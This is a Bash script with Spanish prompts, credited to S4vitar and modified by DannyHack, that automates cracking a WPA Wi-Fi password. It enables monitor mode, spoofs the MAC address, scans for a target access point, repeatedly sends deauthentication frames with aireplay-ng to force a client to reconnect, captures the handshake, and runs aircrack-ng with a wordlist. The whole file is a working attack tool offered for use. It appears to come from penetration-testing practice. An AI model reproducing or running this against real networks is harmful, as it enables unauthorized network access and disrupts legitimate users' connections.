#!/bin/bash

# Autor: S4vitar

# Modificado por: DannyHack

export DEBIAN_FRONTEND=noninteractive

#Funciones

function ctrl_c(){
	echo -e "\n[*] Canselando ataque..."
	tput cnorm
	airmon-ng stop ${tarjeta}mon > /dev/null 2>&1
	exit 0
}

function ayuda(){
	echo -e "\n[*] Uso: wifiCrack -t Tarjeta_de_Red -w Dirección_de_WordList"
	echo -e "\n[*] Las capturas se almacenarán en la carpeta que usted se ubique. Si quieres que se almacene en otro lugar, favor de cancelar el proceso con ctrl_c. Se recomienda crear y dirigirse a una carpeta expecífica y estar cerca de WiFi para realizar el ataque sin problemas."
}

function dependencias(){
	tput civis
	clear
	dependencias=(aircrack-ng macchanger)
	echo "[*] Comprobando programas necesarios..."
	sleep 2

	for programa in "${dependencias[@]}"; do
		echo -ne "\n[*] Herramienta $programa... "
		test -f /usr/bin/$programa

		if [ "$(echo $?)" == "0" ]; then
			echo -e "(V)"
		else
			echo -e "(X)"
			echo -e "[*] Instalando herramienta $programa..."
			apt install $progrma -y > /dev/null 2>&1
		fi
		sleep 1
	done
}

function ataque(){
	clear
	echo -e "[*] Las capturas se almacenarán en la carpeta que usted se ubique. Si quieres que se almacene en otro lugar, favor de cancelar el proceso con ctrl_c. Se recomienda crear y dirigirse a una carpeta expecífica para realizar el ataque sin problemas."
	sleep 10
	clear
	echo -e "[*] Configurando tarjeta de red...\n"
	airmon-ng start $tarjeta > /dev/null 2>&1
	ifconfig ${tarjeta}mon down && macchanger -a ${tarjeta}mon > /dev/null 2>&1
	ifconfig ${tarjeta}mon up; killall dhclient wpa_supplicant 2> /dev/null
	echo -e "[*] Nueva dirección Mac asignada [$(macchanger -s ${tarjeta}mon | grep -i current | xargs | cut -d ' ' -f '3-100')]"
	
	echo -e "\n[*] Una vez hayas ajustado el tamaño de la ventana de xterm y hayas visto la red que deseas atacar, favor de precionar ctrl+c (o dar un solo clic a cerrar). Luego copie y pegue los datos que se le pide a continuación."

	xterm -hold -e "airodump-ng ${tarjeta}mon" &
	airodump_xterm_PID=$!

	tput cnorm
	echo -ne "\n[*] Mac del punto de acceso: " && read apMac
	echo -ne "\n[*] Canal del punto de acceso: " && read apCanal

	kill -9 $airodump_xterm_PID
	wait $airodump_xterm_PID 2>/dev/null
	
	xterm -hold -e "airodump-ng --channel $apCanal --bssid $apMac ${tarjeta}mon" &
	airodump2_xterm_PID=$!
	
	echo -ne "\n[*] Mac del cliente: " && read apMac2
	
	kill -9 $airodump2_xterm_PID
	wait $airodump2_xterm_PID 2>/dev/null

	tput civis
	xterm -hold -e "airodump-ng --channel $apCanal -w Captura --bssid $apMac ${tarjeta}mon" &
	airodump_filter_xterm_PID=$!
	sleep 5
	
	tput cnorm
	while :; do
		#Aquí replay; dudo que se necesite xterm
		xterm -hold -e "aireplay-ng -0 10 -a $apMac -c $apMac2 ${tarjeta}mon" &
		aireplay_xterm_PID=$!
		sleep 15
		kill -9 $aireplay_xterm_PID
		wait $aireplay_xterm_PID 2>/dev/null
		
		echo -ne "\n[?] ¿Se capturó el apretón de mano (handshake) en la xterm? (si/no): " && read respuesta
		if [ $respuesta == "si" ]; then break;	fi
	done
	tput civis
	
	
	kill -9 $airodump_filter_xterm_PID
	wait $airodump_filter_xterm_PID 2>/dev/null
	
	airmon-ng stop ${tarjeta}mon > /dev/null 2>&1

	xterm -hold -e "aircrack-ng -w $wordListPath Captura-01.cap" &
}

# Main

trap ctrl_c INT

if [ "$(id -u)" == "0" ]; then
        declare -i parametro=0; while getopts ":t:w:h:" arg; do
                case $arg in
                        t) tarjeta=$OPTARG; let parametro+=1 ;;
                        w) wordListPath=$OPTARG; let parametro+=1 ;;
                        h) ayuda;;
                esac
        done

        if [ $parametro -ne 2 ]; then
                ayuda
        else
        	dependencias
		ataque
		tput cnorm
	fi
else
	ayuda
	echo -e "\n[-] No eres root"
fi
